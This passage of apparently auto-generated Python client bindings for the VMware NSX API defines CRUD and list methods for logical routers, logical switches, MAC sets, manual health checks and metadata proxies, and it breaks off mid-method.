            :class:`com.vmware.nsx.model_client.LogicalRouterPort`.
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        payload = {
            'logical_router_port_id': logical_router_port_id,
            'logical_router_port': logical_router_port,
        }
        return self._invoke('update', payload)
class LogicalRouters(VapiInterface):
    """
    Bindings for the ``com.vmware.nsx.logical_routers`` vAPI service,
    covering CRUD, service-router reallocation and configuration
    reprocessing of NSX logical routers.
    """

    # Accepted values for the ``router_type`` filter of
    # :func:`LogicalRouters.list`.
    LIST_ROUTER_TYPE_TIER0 = "TIER0"
    LIST_ROUTER_TYPE_TIER1 = "TIER1"

    # Identifier of the service in canonical form.
    _VAPI_SERVICE_ID = 'com.vmware.nsx.logical_routers'

    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration used for creating the underlying stub.
        """
        VapiInterface.__init__(self, config, _LogicalRoutersStub)
        self._VAPI_OPERATION_IDS = {}

    def create(self, logical_router):
        """
        Creates a logical router. Required parameters are router_type (TIER0
        or TIER1) and edge_cluster_id (TIER0 only). Internal and external
        transit network addresses may optionally be supplied.

        :type  logical_router: :class:`com.vmware.nsx.model_client.LogicalRouter`
        :param logical_router: (required)
        :rtype: :class:`com.vmware.nsx.model_client.LogicalRouter`
        :return: com.vmware.nsx.model.LogicalRouter
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        payload = {'logical_router': logical_router}
        return self._invoke('create', payload)

    def delete(self, logical_router_id, cascade_delete_linked_ports=None, force=None):
        """
        Deletes the specified logical router. Associated logical router
        ports must be deleted first; alternatively pass force=true as a
        query parameter to force-delete the router together with all related
        ports and other associated entities.

        :type  logical_router_id: :class:`str`
        :param logical_router_id: (required)
        :type  cascade_delete_linked_ports: :class:`bool` or ``None``
        :param cascade_delete_linked_ports: Whether to also delete related
            logical switch ports (optional, default to false)
        :type  force: :class:`bool` or ``None``
        :param force: Force delete the resource even if it is being used
            somewhere (optional, default to false)
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        payload = {
            'logical_router_id': logical_router_id,
            'cascade_delete_linked_ports': cascade_delete_linked_ports,
            'force': force,
        }
        return self._invoke('delete', payload)

    def get(self, logical_router_id):
        """
        Returns information about the specified logical router.

        :type  logical_router_id: :class:`str`
        :param logical_router_id: (required)
        :rtype: :class:`com.vmware.nsx.model_client.LogicalRouter`
        :return: com.vmware.nsx.model.LogicalRouter
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        payload = {'logical_router_id': logical_router_id}
        return self._invoke('get', payload)

    def list(self, cursor=None, included_fields=None, page_size=None,
             router_type=None, sort_ascending=None, sort_by=None):
        """
        Returns information about all logical routers, including the UUID,
        internal and external transit network addresses, and the router type
        (TIER0 or TIER1). The router_type query parameter restricts the
        result to only TIER0 or only TIER1 routers.

        :type  cursor: :class:`str` or ``None``
        :param cursor: Opaque cursor for the next page of records, as
            supplied by the current result page (optional)
        :type  included_fields: :class:`str` or ``None``
        :param included_fields: Comma separated list of fields to include in
            the query result (optional)
        :type  page_size: :class:`long` or ``None``
        :param page_size: Maximum number of results per page; the server may
            return fewer (optional, default to 1000)
        :type  router_type: :class:`str` or ``None``
        :param router_type: Type of Logical Router (optional)
        :type  sort_ascending: :class:`bool` or ``None``
        :param sort_ascending: (optional)
        :type  sort_by: :class:`str` or ``None``
        :param sort_by: Field by which records are sorted (optional)
        :rtype: :class:`com.vmware.nsx.model_client.LogicalRouterListResult`
        :return: com.vmware.nsx.model.LogicalRouterListResult
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        payload = {
            'cursor': cursor,
            'included_fields': included_fields,
            'page_size': page_size,
            'router_type': router_type,
            'sort_ascending': sort_ascending,
            'sort_by': sort_by,
        }
        return self._invoke('list', payload)

    def reallocate(self, logical_router_id, service_router_allocation_config):
        """
        Re-allocates edge node placement for a TIER1 logical router. Service
        routers of the TIER1 router can be re-allocated within the same edge
        cluster or onto a different one; edge nodes may also be placed
        manually, with at most two indices for HA mode ACTIVE_STANDBY.
        Re-allocating onto a new edge cluster requires that the TIER1
        logical router already has an edge cluster. This is a disruptive
        operation and all existing statistics of the logical router are
        removed.

        :type  logical_router_id: :class:`str`
        :param logical_router_id: (required)
        :type  service_router_allocation_config: :class:`com.vmware.nsx.model_client.ServiceRouterAllocationConfig`
        :param service_router_allocation_config: (required)
        :rtype: :class:`com.vmware.nsx.model_client.LogicalRouter`
        :return: com.vmware.nsx.model.LogicalRouter
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        payload = {
            'logical_router_id': logical_router_id,
            'service_router_allocation_config': service_router_allocation_config,
        }
        return self._invoke('reallocate', payload)

    def reprocess(self, logical_router_id):
        """
        Reprocesses the logical router configuration and the configuration
        of related entities (logical router ports, static routing, etc.);
        any missing updates are published to the controller.

        :type  logical_router_id: :class:`str`
        :param logical_router_id: (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        payload = {'logical_router_id': logical_router_id}
        return self._invoke('reprocess', payload)

    def update(self, logical_router_id, logical_router):
        """
        Modifies the specified logical router. Modifiable attributes include
        the internal_transit_network, external_transit_networks, and
        edge_cluster_id (for TIER0 routers).

        :type  logical_router_id: :class:`str`
        :param logical_router_id: (required)
        :type  logical_router: :class:`com.vmware.nsx.model_client.LogicalRouter`
        :param logical_router: (required)
        :rtype: :class:`com.vmware.nsx.model_client.LogicalRouter`
        :return: com.vmware.nsx.model.LogicalRouter
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        payload = {
            'logical_router_id': logical_router_id,
            'logical_router': logical_router,
        }
        return self._invoke('update', payload)
class LogicalSwitches(VapiInterface):
    """
    Bindings for the ``com.vmware.nsx.logical_switches`` vAPI service,
    providing CRUD and list operations on NSX logical switches.
    """

    # Accepted values for the ``transport_type`` filter of
    # :func:`LogicalSwitches.list`.
    LIST_TRANSPORT_TYPE_OVERLAY = "OVERLAY"
    LIST_TRANSPORT_TYPE_VLAN = "VLAN"

    # Identifier of the service in canonical form.
    _VAPI_SERVICE_ID = 'com.vmware.nsx.logical_switches'

    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration used for creating the underlying stub.
        """
        VapiInterface.__init__(self, config, _LogicalSwitchesStub)
        self._VAPI_OPERATION_IDS = {}

    def create(self, logical_switch):
        """
        Creates a new logical switch. The request must include the
        transport_zone_id, display_name, and admin_state (UP or DOWN). The
        replication_mode (MTEP or SOURCE) is required for overlay logical
        switches but not for VLAN-based ones; VLAN-based logical switches
        must supply a vlan.

        :type  logical_switch: :class:`com.vmware.nsx.model_client.LogicalSwitch`
        :param logical_switch: (required)
        :rtype: :class:`com.vmware.nsx.model_client.LogicalSwitch`
        :return: com.vmware.nsx.model.LogicalSwitch
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        payload = {'logical_switch': logical_switch}
        return self._invoke('create', payload)

    def delete(self, lswitch_id, cascade=None, detach=None):
        """
        Removes a logical switch from the associated overlay or VLAN
        transport zone. By default a logical switch cannot be deleted while
        it has logical ports or is a member of an NSGroup. The cascade
        option deletes all ports along with the switch; the detach option
        force-deletes the switch.

        :type  lswitch_id: :class:`str`
        :param lswitch_id: (required)
        :type  cascade: :class:`bool` or ``None``
        :param cascade: Delete a Logical Switch and all the logical ports in
            it, provided none of the logical ports have any attachment.
            (optional, default to false)
        :type  detach: :class:`bool` or ``None``
        :param detach: Force delete a logical switch (optional, default to
            false)
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        payload = {
            'lswitch_id': lswitch_id,
            'cascade': cascade,
            'detach': detach,
        }
        return self._invoke('delete', payload)

    def get(self, lswitch_id):
        """
        Returns information about the logical switch with the specified Id.

        :type  lswitch_id: :class:`str`
        :param lswitch_id: (required)
        :rtype: :class:`com.vmware.nsx.model_client.LogicalSwitch`
        :return: com.vmware.nsx.model.LogicalSwitch
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        payload = {'lswitch_id': lswitch_id}
        return self._invoke('get', payload)

    def list(self, cursor=None, diagnostic=None, included_fields=None,
             page_size=None, sort_ascending=None, sort_by=None,
             switching_profile_id=None, transport_type=None,
             transport_zone_id=None, uplink_teaming_policy_name=None,
             vlan=None, vni=None):
        """
        Returns information about all configured logical switches.

        :type  cursor: :class:`str` or ``None``
        :param cursor: Opaque cursor for the next page of records, as
            supplied by the current result page (optional)
        :type  diagnostic: :class:`bool` or ``None``
        :param diagnostic: Flag to enable showing of transit logical switch.
            (optional, default to false)
        :type  included_fields: :class:`str` or ``None``
        :param included_fields: Comma separated list of fields to include in
            the query result (optional)
        :type  page_size: :class:`long` or ``None``
        :param page_size: Maximum number of results per page; the server may
            return fewer (optional, default to 1000)
        :type  sort_ascending: :class:`bool` or ``None``
        :param sort_ascending: (optional)
        :type  sort_by: :class:`str` or ``None``
        :param sort_by: Field by which records are sorted (optional)
        :type  switching_profile_id: :class:`str` or ``None``
        :param switching_profile_id: Switching Profile identifier (optional)
        :type  transport_type: :class:`str` or ``None``
        :param transport_type: Mode of transport supported in the transport
            zone for this logical switch (optional)
        :type  transport_zone_id: :class:`str` or ``None``
        :param transport_zone_id: Transport zone identifier (optional)
        :type  uplink_teaming_policy_name: :class:`str` or ``None``
        :param uplink_teaming_policy_name: The logical switch's uplink
            teaming policy name (optional)
        :type  vlan: :class:`long` or ``None``
        :param vlan: Virtual Local Area Network Identifier (optional)
        :type  vni: :class:`long` or ``None``
        :param vni: VNI of the OVERLAY LogicalSwitch(es) to return.
            (optional)
        :rtype: :class:`com.vmware.nsx.model_client.LogicalSwitchListResult`
        :return: com.vmware.nsx.model.LogicalSwitchListResult
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        payload = {
            'cursor': cursor,
            'diagnostic': diagnostic,
            'included_fields': included_fields,
            'page_size': page_size,
            'sort_ascending': sort_ascending,
            'sort_by': sort_by,
            'switching_profile_id': switching_profile_id,
            'transport_type': transport_type,
            'transport_zone_id': transport_zone_id,
            'uplink_teaming_policy_name': uplink_teaming_policy_name,
            'vlan': vlan,
            'vni': vni,
        }
        return self._invoke('list', payload)

    def update(self, lswitch_id, logical_switch):
        """
        Modifies attributes of an existing logical switch. Modifiable
        attributes include admin_state, replication_mode,
        switching_profile_ids and the VLAN spec. The original
        transport_zone_id cannot be changed.

        :type  lswitch_id: :class:`str`
        :param lswitch_id: (required)
        :type  logical_switch: :class:`com.vmware.nsx.model_client.LogicalSwitch`
        :param logical_switch: (required)
        :rtype: :class:`com.vmware.nsx.model_client.LogicalSwitch`
        :return: com.vmware.nsx.model.LogicalSwitch
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        payload = {
            'lswitch_id': lswitch_id,
            'logical_switch': logical_switch,
        }
        return self._invoke('update', payload)
class MacSets(VapiInterface):
    """
    Bindings for the ``com.vmware.nsx.mac_sets`` vAPI service, providing
    CRUD and list operations on NSX MACSets (named groups of MAC
    addresses).
    """

    # Identifier of the service in canonical form.
    _VAPI_SERVICE_ID = 'com.vmware.nsx.mac_sets'

    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration used for creating the underlying stub.
        """
        VapiInterface.__init__(self, config, _MacSetsStub)
        self._VAPI_OPERATION_IDS = {}

    def create(self, m_ac_set):
        """
        Creates a new MACSet that can group individual MAC addresses.

        :type  m_ac_set: :class:`com.vmware.nsx.model_client.MACSet`
        :param m_ac_set: (required)
        :rtype: :class:`com.vmware.nsx.model_client.MACSet`
        :return: com.vmware.nsx.model.MACSet
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        payload = {'m_ac_set': m_ac_set}
        return self._invoke('create', payload)

    def delete(self, mac_set_id, force=None):
        """
        Deletes the specified MACSet. By default a MACSet that has been
        added to an NSGroup is not deleted; in that case pass force=true as
        a query parameter to force-delete it.

        :type  mac_set_id: :class:`str`
        :param mac_set_id: MACSet Id (required)
        :type  force: :class:`bool` or ``None``
        :param force: Force delete the resource even if it is being used
            somewhere (optional, default to false)
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.ConcurrentChange` Conflict
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        payload = {
            'mac_set_id': mac_set_id,
            'force': force,
        }
        return self._invoke('delete', payload)

    def get(self, mac_set_id):
        """
        Returns information about the specified MACSet.

        :type  mac_set_id: :class:`str`
        :param mac_set_id: MACSet Id (required)
        :rtype: :class:`com.vmware.nsx.model_client.MACSet`
        :return: com.vmware.nsx.model.MACSet
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        payload = {'mac_set_id': mac_set_id}
        return self._invoke('get', payload)

    def list(self, cursor=None, included_fields=None, page_size=None,
             sort_ascending=None, sort_by=None):
        """
        Returns a paginated list of MACSets.

        :type  cursor: :class:`str` or ``None``
        :param cursor: Opaque cursor for the next page of records, as
            supplied by the current result page (optional)
        :type  included_fields: :class:`str` or ``None``
        :param included_fields: Comma separated list of fields to include in
            the query result (optional)
        :type  page_size: :class:`long` or ``None``
        :param page_size: Maximum number of results per page; the server may
            return fewer (optional, default to 1000)
        :type  sort_ascending: :class:`bool` or ``None``
        :param sort_ascending: (optional)
        :type  sort_by: :class:`str` or ``None``
        :param sort_by: Field by which records are sorted (optional)
        :rtype: :class:`com.vmware.nsx.model_client.MACSetListResult`
        :return: com.vmware.nsx.model.MACSetListResult
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        payload = {
            'cursor': cursor,
            'included_fields': included_fields,
            'page_size': page_size,
            'sort_ascending': sort_ascending,
            'sort_by': sort_by,
        }
        return self._invoke('list', payload)

    def update(self, mac_set_id, m_ac_set):
        """
        Updates the specified MACSet. Modifiable parameters include the
        description, display_name and mac_addresses.

        :type  mac_set_id: :class:`str`
        :param mac_set_id: MACSet Id (required)
        :type  m_ac_set: :class:`com.vmware.nsx.model_client.MACSet`
        :param m_ac_set: (required)
        :rtype: :class:`com.vmware.nsx.model_client.MACSet`
        :return: com.vmware.nsx.model.MACSet
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        payload = {
            'mac_set_id': mac_set_id,
            'm_ac_set': m_ac_set,
        }
        return self._invoke('update', payload)
class ManualHealthChecks(VapiInterface):
    """
    Client-side binding for the manual health check service.
    """
    _VAPI_SERVICE_ID = 'com.vmware.nsx.manual_health_checks'
    """
    Identifier of the service in canonical form.
    """
    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        super(ManualHealthChecks, self).__init__(config, _ManualHealthChecksStub)
        self._VAPI_OPERATION_IDS = {}
    def create(self,
               manual_health_check,
               ):
        """
        Create a new manual health check request with essential properties.
        Creation is rejected while 50 or more manual health checks are still
        in progress. A finished manual health check is removed automatically
        24 hours after completion.

        :type manual_health_check: :class:`com.vmware.nsx.model_client.ManualHealthCheck`
        :param manual_health_check: (required)
        :rtype: :class:`com.vmware.nsx.model_client.ManualHealthCheck`
        :return: com.vmware.nsx.model.ManualHealthCheck
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        call_args = {
            'manual_health_check': manual_health_check,
        }
        return self._invoke('create', call_args)
    def delete(self,
               manual_health_check_id,
               ):
        """
        Delete an existing manual health check by ID.

        :type manual_health_check_id: :class:`str`
        :param manual_health_check_id: (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        call_args = {
            'manual_health_check_id': manual_health_check_id,
        }
        return self._invoke('delete', call_args)
    def get(self,
            manual_health_check_id,
            ):
        """
        Get an existing manual health check by health check ID.

        :type manual_health_check_id: :class:`str`
        :param manual_health_check_id: (required)
        :rtype: :class:`com.vmware.nsx.model_client.ManualHealthCheck`
        :return: com.vmware.nsx.model.ManualHealthCheck
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        call_args = {
            'manual_health_check_id': manual_health_check_id,
        }
        return self._invoke('get', call_args)
    def list(self,
             cursor=None,
             included_fields=None,
             page_size=None,
             sort_ascending=None,
             sort_by=None,
             ):
        """
        Query manual health checks with list parameters.

        :type cursor: :class:`str` or ``None``
        :param cursor: Opaque cursor to be used for getting next page of records (supplied
            by current result page) (optional)
        :type included_fields: :class:`str` or ``None``
        :param included_fields: Comma separated list of fields that should be included in query
            result (optional)
        :type page_size: :class:`long` or ``None``
        :param page_size: Maximum number of results to return in this page (server may return
            fewer) (optional, default to 1000)
        :type sort_ascending: :class:`bool` or ``None``
        :param sort_ascending: (optional)
        :type sort_by: :class:`str` or ``None``
        :param sort_by: Field by which records are sorted (optional)
        :rtype: :class:`com.vmware.nsx.model_client.ManualHealthCheckListResult`
        :return: com.vmware.nsx.model.ManualHealthCheckListResult
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        call_args = {
            'cursor': cursor,
            'included_fields': included_fields,
            'page_size': page_size,
            'sort_ascending': sort_ascending,
            'sort_by': sort_by,
        }
        return self._invoke('list', call_args)
class MdProxies(VapiInterface):
    """
    Client-side binding for the metadata proxy service.
    """
    _VAPI_SERVICE_ID = 'com.vmware.nsx.md_proxies'
    """
    Identifier of the service in canonical form.
    """
    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        super(MdProxies, self).__init__(config, _MdProxiesStub)
        self._VAPI_OPERATION_IDS = {}
    def create(self,
               metadata_proxy,
               ):
        """
        Create a metadata proxy.

        :type metadata_proxy: :class:`com.vmware.nsx.model_client.MetadataProxy`
        :param metadata_proxy: (required)
        :rtype: :class:`com.vmware.nsx.model_client.MetadataProxy`
        :return: com.vmware.nsx.model.MetadataProxy
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        call_args = {
            'metadata_proxy': metadata_proxy,
        }
        return self._invoke('create', call_args)
    def delete(self,
               proxy_id,
               ):
        """
        Delete a metadata proxy.

        :type proxy_id: :class:`str`
        :param proxy_id: (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        call_args = {
            'proxy_id': proxy_id,
        }
        return self._invoke('delete', call_args)
    def get(self,
            proxy_id,
            ):
        """
        Get a metadata proxy.

        :type proxy_id: :class:`str`
        :param proxy_id: (required)
        :rtype: :class:`com.vmware.nsx.model_client.MetadataProxy`
        :return: com.vmware.nsx.model.MetadataProxy
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        call_args = {
            'proxy_id': proxy_id,
        }
        return self._invoke('get', call_args)
    def list(self,
             cursor=None,
             included_fields=None,
             page_size=None,
             sort_ascending=None,
             sort_by=None,
             ):
        """
        Get a paginated list of metadata proxies.

        :type cursor: :class:`str` or ``None``
        :param cursor: Opaque cursor to be used for getting next page of records (supplied
            by current result page) (optional)
        :type included_fields: :class:`str` or ``None``
        :param included_fields: Comma separated list of fields that should be included in query
            result (optional)
        :type page_size: :class:`long` or ``None``
        :param page_size: Maximum number of results to return in this page (server may return
            fewer) (optional, default to 1000)
        :type sort_ascending: :class:`bool` or ``None``
        :param sort_ascending: (optional)
        :type sort_by: :class:`str` or ``None``
        :param sort_by: Field by which records are sorted (optional)
        :rtype: :class:`com.vmware.nsx.model_client.MetadataProxyListResult`
        :return: com.vmware.nsx.model.MetadataProxyListResult
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        call_args = {
            'cursor': cursor,
            'included_fields': included_fields,
            'page_size': page_size,
            'sort_ascending': sort_ascending,
            'sort_by': sort_by,
        }
        return self._invoke('list', call_args)
    def update(self,
               proxy_id,
               metadata_proxy,
               ):
        """
        Update a metadata proxy.

        :type proxy_id: :class:`str`
        :param proxy_id: (required)
        :type metadata_proxy: :class:`com.vmware.nsx.model_client.MetadataProxy`
        :param metadata_proxy: (required)
        :rtype: :class:`com.vmware.nsx.model_client.MetadataProxy`
        :return: com.vmware.nsx.model.MetadataProxy
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        call_args = {
